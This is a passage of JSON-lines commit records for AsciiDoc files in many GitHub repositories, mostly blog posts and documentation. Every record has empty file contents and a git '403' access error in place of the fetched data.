2016-11-02-Episode-77-Bust-your-Bone.adoc","message":"Update 2016-11-02-Episode-77-Bust-your-Bone.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-11-02-Episode-77-Bust-your-Bone.adoc","new_file":"_posts\/2016-11-02-Episode-77-Bust-your-Bone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7ecd4d593c85e2c143066dad5a5cb4e45a8cbe5","subject":"Update 2016-02-11-Descomplicando-gulp.adoc","message":"Update 2016-02-11-Descomplicando-gulp.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-02-11-Descomplicando-gulp.adoc","new_file":"_posts\/2016-02-11-Descomplicando-gulp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c276c02f88087442c4698c9cb00466f24ab4328a","subject":"Update 2017-06-22-A-Disjuncao-no-Prolog.adoc","message":"Update 2017-06-22-A-Disjuncao-no-Prolog.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc","new_file":"_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48e05c0f1ad0fc0f1409e5c89d513d9430b2cca1","subject":"Update 2016-02-06-Learning-resources.adoc","message":"Update 2016-02-06-Learning-resources.adoc","repos":"CBSti\/CBSti.github.io,CBSti\/CBSti.github.io,CBSti\/CBSti.github.io","old_file":"_posts\/2016-02-06-Learning-resources.adoc","new_file":"_posts\/2016-02-06-Learning-resources.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CBSti\/CBSti.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"504d4dad3c3bb7cb5da561eb7e556e8fdddb3371","subject":"Update 2016-6-27-file-getput-content.adoc","message":"Update 2016-6-27-file-getput-content.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-27-file-getput-content.adoc","new_file":"_posts\/2016-6-27-file-getput-content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"79c67a2b5f10ad4ab105cc273d86945a8019d86e","subject":"Update 2016-05-17-Budapest-JS-2016-Part-II-The-Talks.adoc","message":"Update 2016-05-17-Budapest-JS-2016-Part-II-The-Talks.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-05-17-Budapest-JS-2016-Part-II-The-Talks.adoc","new_file":"_posts\/2016-05-17-Budapest-JS-2016-Part-II-The-Talks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cfd222a6271cf36b285c08547ce4e732df4e5b77","subject":"Add shop module doc.","message":"Add shop module doc.\n","repos":"ImagicTheCat\/vRP,ImagicTheCat\/vRP","old_file":"doc\/dev\/modules\/shop.adoc","new_file":"doc\/dev\/modules\/shop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ImagicTheCat\/vRP.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03abb4b39fc573aabe4d2532edf5caf48b0d9423","subject":"Renamed '_posts\/2017-10-11-test.adoc' to '_posts\/2017-10-11.adoc'","message":"Renamed '_posts\/2017-10-11-test.adoc' to '_posts\/2017-10-11.adoc'","repos":"wushaobo\/wushaobo.github.io,wushaobo\/wushaobo.github.io,wushaobo\/wushaobo.github.io,wushaobo\/wushaobo.github.io","old_file":"_posts\/2017-10-11.adoc","new_file":"_posts\/2017-10-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wushaobo\/wushaobo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"839515171129c4cb8ec940c60202f22fdc3128ee","subject":"New README for analysis scripts","message":"New README for analysis scripts\n","repos":"ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor","old_file":"workflows\/cp-leaveout\/scripts\/README.adoc","new_file":"workflows\/cp-leaveout\/scripts\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ECP-CANDLE\/Supervisor.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d50425517f049caca4183ab86e0572f2469b6c6","subject":"Update 2016-08-19-laravel-with-pusher.adoc","message":"Update 2016-08-19-laravel-with-pusher.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-19-laravel-with-pusher.adoc","new_file":"_posts\/2016-08-19-laravel-with-pusher.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d00b47d50b09537f77e0828f41184330ed0a0b00","subject":"Initial version of Release Guide","message":"Initial version of Release Guide\n","repos":"ssinica\/backup,ssinica\/backup,ssinica\/backup","old_file":"docs\/releasing-guide.adoc","new_file":"docs\/releasing-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ssinica\/backup.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1fe2e9877c29f7b92a3a2745138432471146a5dd","subject":"docs: Add breakpad documentation to user guide","message":"docs: Add breakpad documentation to user guide\n\nChange-Id: I05275aab0196dbf8fc37da320a0bf34662606a14\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/6504\nTested-by: Kudu Jenkins\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu","old_file":"docs\/troubleshooting.adoc","new_file":"docs\/troubleshooting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2ca61d9c372d69a9728c70c24d4694570b99b3b7","subject":"Improve notes a bit.","message":"Improve notes a bit.\n","repos":"lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/09\/23\/hawkular-1.0.0.Alpha5-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/09\/23\/hawkular-1.0.0.Alpha5-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4be5ffd5ff3d598ec5a847edd9689d68a2e18d35","subject":"Update 2015-10-15-Proposal-for-Kubernetes-Service-Annotations-Update-1.adoc","message":"Update 2015-10-15-Proposal-for-Kubernetes-Service-Annotations-Update-1.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-10-15-Proposal-for-Kubernetes-Service-Annotations-Update-1.adoc","new_file":"_posts\/2015-10-15-Proposal-for-Kubernetes-Service-Annotations-Update-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f66d0c657846fcb4e0d0c2d4b69b413d33622524","subject":"Init Project","message":"Init Project\n\nSigned-off-by: Mike Schilling <49f7fbe9e108b60288e59e5258af85ba6e5f3584@gmail.com>\n","repos":"bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bindstone\/graphbank.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"28acae92eda7264f097aceb19bfa6e19cba80c23","subject":"Add Release Notes","message":"Add Release Notes\n","repos":"EMBL-EBI-SUBS\/subs-api,EMBL-EBI-SUBS\/subs-api","old_file":"RELEASE.adoc","new_file":"RELEASE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMBL-EBI-SUBS\/subs-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0fdeb90f8d8a45b1e8088c9a1d921efd7aaf8f0a","subject":"Style-Sachen in eigene Datei ausgelagert","message":"Style-Sachen in eigene Datei ausgelagert\n","repos":"oboehm\/jfachwert,oboehm\/jfachwert,oboehm\/jfachwert","old_file":"src\/main\/asciidoc\/de\/includes\/style.adoc","new_file":"src\/main\/asciidoc\/de\/includes\/style.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oboehm\/jfachwert.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"db0e7341808e7d96a9ab8d2f9a02226ff31aafd0","subject":"Update 2015-06-09-Cousteaus-Journey.adoc","message":"Update 2015-06-09-Cousteaus-Journey.adoc","repos":"jsonify\/jsonify.github.io,jsonify\/jsonify.github.io,jsonify\/jsonify.github.io","old_file":"_posts\/2015-06-09-Cousteaus-Journey.adoc","new_file":"_posts\/2015-06-09-Cousteaus-Journey.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsonify\/jsonify.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ef034304bdf17c468a840abc6e392e34c4267ce","subject":"Renamed '_posts\/2019-02-10-RTFM-Part-1.adoc' to '_posts\/2019-02-10-RTFM-Episode-0x01.adoc'","message":"Renamed '_posts\/2019-02-10-RTFM-Part-1.adoc' to '_posts\/2019-02-10-RTFM-Episode-0x01.adoc'","repos":"kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io","old_file":"_posts\/2019-02-10-RTFM-Episode-0x01.adoc","new_file":"_posts\/2019-02-10-RTFM-Episode-0x01.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kr-b\/kr-b.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9850cd471156b55feafc193a0f104e934ccecfc","subject":"add note about url encoding and more detail about failure when writing data","message":"add note about url encoding and more detail about failure when writing data\n","repos":"jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsanda\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d4f8b1e1e9b456e3c28d059d6a4f67b97f3fe51f","subject":"Delete the file at '_posts\/2019-01-31-PlaidCTF-2017-Writeup.adoc'","message":"Delete the file at '_posts\/2019-01-31-PlaidCTF-2017-Writeup.adoc'","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2019-01-31-PlaidCTF-2017-Writeup.adoc","new_file":"_posts\/2019-01-31-PlaidCTF-2017-Writeup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3256d003e78b0c4264abed94038528aea4d89f9d","subject":"Strategic Oscillation: docs","message":"Strategic Oscillation: docs\n","repos":"oskopek\/optaplanner-website,bibryam\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,psiroky\/optaplanner-website,psiroky\/optaplanner-website,droolsjbpm\/optaplanner-website,psiroky\/optaplanner-website,bibryam\/optaplanner-website,droolsjbpm\/optaplanner-website,bibryam\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"download\/releaseNotes\/releaseNotes6.2.adoc","new_file":"download\/releaseNotes\/releaseNotes6.2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8db66eb0e86db73e942c60f439caa17703ec62ef","subject":"Update 2016-12-2-3-D.adoc","message":"Update 2016-12-2-3-D.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-2-3-D.adoc","new_file":"_posts\/2016-12-2-3-D.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf89f3b499dc4724deefd68cff328370e23ad73d","subject":"Update DS_Store-TEST.adoc","message":"Update DS_Store-TEST.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/DS_Store-TEST.adoc","new_file":"_posts\/DS_Store-TEST.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a061d49f17540b0d512255a46735372795d71df7","subject":"Added description of TaskCache Hash value (#10)","message":"Added description of TaskCache Hash value (#10)\n\n","repos":"libyal\/winreg-kb,libyal\/winreg-kb","old_file":"documentation\/Task Scheduler Keys.asciidoc","new_file":"documentation\/Task Scheduler Keys.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/winreg-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2737f75be16dddea132c63dbbd04ebb0b3c4d89d","subject":"zaujimavy system","message":"zaujimavy system\n","repos":"oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,oskopek\/carcv","old_file":"AUTHORS.adoc","new_file":"AUTHORS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sk413025\/carcv.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6638b37c5e4aa5e1357d2ba06b9953df4d6d87f3","subject":"fixes #114 docs: Major differences and motivation vs. nanomsg","message":"fixes #114 docs: Major differences and motivation vs. nanomsg\n","repos":"nanomsg\/nng,nanomsg\/nng,nanomsg\/nng,nanomsg\/nng","old_file":"RATIONALE.adoc","new_file":"RATIONALE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nanomsg\/nng.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb8642e7b007154de0c9acbe148befd79266221f","subject":"Update 2016-04-15-Episode-53-Drop-a-Rotary-In-It.adoc","message":"Update 2016-04-15-Episode-53-Drop-a-Rotary-In-It.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-04-15-Episode-53-Drop-a-Rotary-In-It.adoc","new_file":"_posts\/2016-04-15-Episode-53-Drop-a-Rotary-In-It.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90a4e448ca41df4cef81e712e06f25d39f4f6503","subject":"Update 2016-04-25-What-is-The-Angler-Exploit-Kit.adoc","message":"Update 2016-04-25-What-is-The-Angler-Exploit-Kit.adoc","repos":"fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly","old_file":"_posts\/2016-04-25-What-is-The-Angler-Exploit-Kit.adoc","new_file":"_posts\/2016-04-25-What-is-The-Angler-Exploit-Kit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fwalloe\/infosecbriefly.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd02ac8178d8d1b6c69e0dbb46168cf92a45bb78","subject":"fixing https:\/\/github.com\/docker\/labs\/issues\/351","message":"fixing https:\/\/github.com\/docker\/labs\/issues\/351\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch03-build-image-java-9.adoc","new_file":"developer-tools\/java\/chapters\/ch03-build-image-java-9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ea8707f3dbda21d47482002aafc07e212211d227","subject":"fix typo in word container","message":"fix typo in word container","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch04-run-container.adoc","new_file":"developer-tools\/java\/chapters\/ch04-run-container.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dbcf878ca104a05867771c13b09ec126301e1fb3","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ebb56121d5347a88da9da4f9e49bd5efca076f2","subject":"Delete 2015-02-11-.adoc","message":"Delete 2015-02-11-.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2015-02-11-.adoc","new_file":"_posts\/2015-02-11-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29405690966b81a3a84706cdb87bb8819af6617b","subject":"Update 2015-03-19-.adoc","message":"Update 2015-03-19-.adoc","repos":"hanwencheng\/Undepth,hanwencheng\/Undepth,hanwencheng\/Undepth","old_file":"_posts\/2015-03-19-.adoc","new_file":"_posts\/2015-03-19-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hanwencheng\/Undepth.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff062227de700f0c4d81a8b74738e77fdd30c211","subject":"Update 2018-04-02-.adoc","message":"Update 2018-04-02-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-02-.adoc","new_file":"_posts\/2018-04-02-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"afb0e2a179da221d9c48546c7f735cde23fd85bd","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d45874c430600ada264a27c96bf84ca98b00fff","subject":"Update 2017-03-17-iphone-irkit-arduino.adoc","message":"Update 2017-03-17-iphone-irkit-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-17-iphone-irkit-arduino.adoc","new_file":"_posts\/2017-03-17-iphone-irkit-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32ca354fcac2fda4749c748fc1406e1aa89ef525","subject":"Update 2012-12-1-Frisbeens-historie.adoc","message":"Update 2012-12-1-Frisbeens-historie.adoc","repos":"discimport\/blog.discimport.dk,discimport\/blog.discimport.dk,discimport\/blog.discimport.dk,discimport\/blog.discimport.dk","old_file":"_posts\/2012-12-1-Frisbeens-historie.adoc","new_file":"_posts\/2012-12-1-Frisbeens-historie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/discimport\/blog.discimport.dk.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06744e95f19e585dbfccd8b67b10a23de99b65bd","subject":"Update 2016-07-26-this-is-something.adoc","message":"Update 2016-07-26-this-is-something.adoc","repos":"markfetherolf\/markfetherolf.github.io,markfetherolf\/markfetherolf.github.io,markfetherolf\/markfetherolf.github.io,markfetherolf\/markfetherolf.github.io","old_file":"_posts\/2016-07-26-this-is-something.adoc","new_file":"_posts\/2016-07-26-this-is-something.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markfetherolf\/markfetherolf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be57a6a8e98fe686c0ad88e5eb6f440b84cb94ff","subject":"Update 2017-02-25-image-File-Reader.adoc","message":"Update 2017-02-25-image-File-Reader.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-25-image-File-Reader.adoc","new_file":"_posts\/2017-02-25-image-File-Reader.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8a5a23c22e4d24f3a4cc534bc160229f73747fb","subject":"Update 2015-07-08-iOS-App-Pic-Scanner.adoc","message":"Update 2015-07-08-iOS-App-Pic-Scanner.adoc","repos":"visionui\/visionui.github.io,visionui\/visionui.github.io,visionui\/visionui.github.io","old_file":"_posts\/2015-07-08-iOS-App-Pic-Scanner.adoc","new_file":"_posts\/2015-07-08-iOS-App-Pic-Scanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/visionui\/visionui.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"532f2ba5d4fad7ea9cab68459eaac80624d925a9","subject":"y2b create post $500 Luxury Nintendo","message":"y2b create post $500 Luxury Nintendo","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-09-16-500-Luxury-Nintendo.adoc","new_file":"_posts\/2015-09-16-500-Luxury-Nintendo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"24d486e0428fbd7971c72ebe498b9fbc2ab1d9ac","subject":"Update 2016-08-09-Santorini-map-guide.adoc","message":"Update 2016-08-09-Santorini-map-guide.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2d10c8c17a856b70579880e0cdf14a53333dfe2","subject":"Update 2016-5-13-Engineer-Career-Path.adoc","message":"Update 2016-5-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-5-13-Engineer-Career-Path.adoc","new_file":"_posts\/2016-5-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0705f8126fde6a453c9adee7013d250ccc69a60b","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 